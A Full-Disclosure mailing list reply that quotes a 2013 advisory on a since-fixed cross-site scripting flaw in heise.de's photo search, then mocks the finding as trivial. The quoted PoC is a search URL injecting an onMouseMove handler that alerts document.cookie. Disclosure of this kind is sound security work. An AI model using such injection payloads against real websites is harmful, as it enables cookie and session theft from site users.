Re: http://www.heise.de - Cross-site Scripting vulnerability

[osaft <osaft () lavabit com>]

On Thu, 10 Jan 2013 19:47:25 +0100
Stefan Schurtz <sschurtz () t-online de> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Advisory:             heise.de - Cross-site Scripting vulnerability
> Advisory ID:          SSCHADV2013-002
> Author:                       Stefan Schurtz
> Affected Software:    Successfully tested on heise.de
> Vendor URL:           http://www.heise.de
> Vendor Status:                fixed
>
> ==========================
> Vulnerability Description
> ==========================
>
> http://www.heise.de is prone to a XSS vulnerability
>
> ==========================
> PoC-Exploit
> ==========================
>
> http://www.heise.de/foto/galerie/suche/photo/?suchwort=";
> onMouseMove=alert(document.cookie) '
>
> ==========================
> Solution
> ==========================
>
> fixed
>
> ==========================
> Disclosure Timeline
> ==========================
>
> 03-Jan-2013 - informed heise Security
> 04-Jan-2012 - fixed by developer
>
> ==========================
> Credits
> ==========================
>
> Vulnerability found and advisory written by Stefan Schurtz.

Now thats valeable information. Thank god that you informed about this
groundbreaking issue, Stefan. I will update my personal heise.de right
away.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/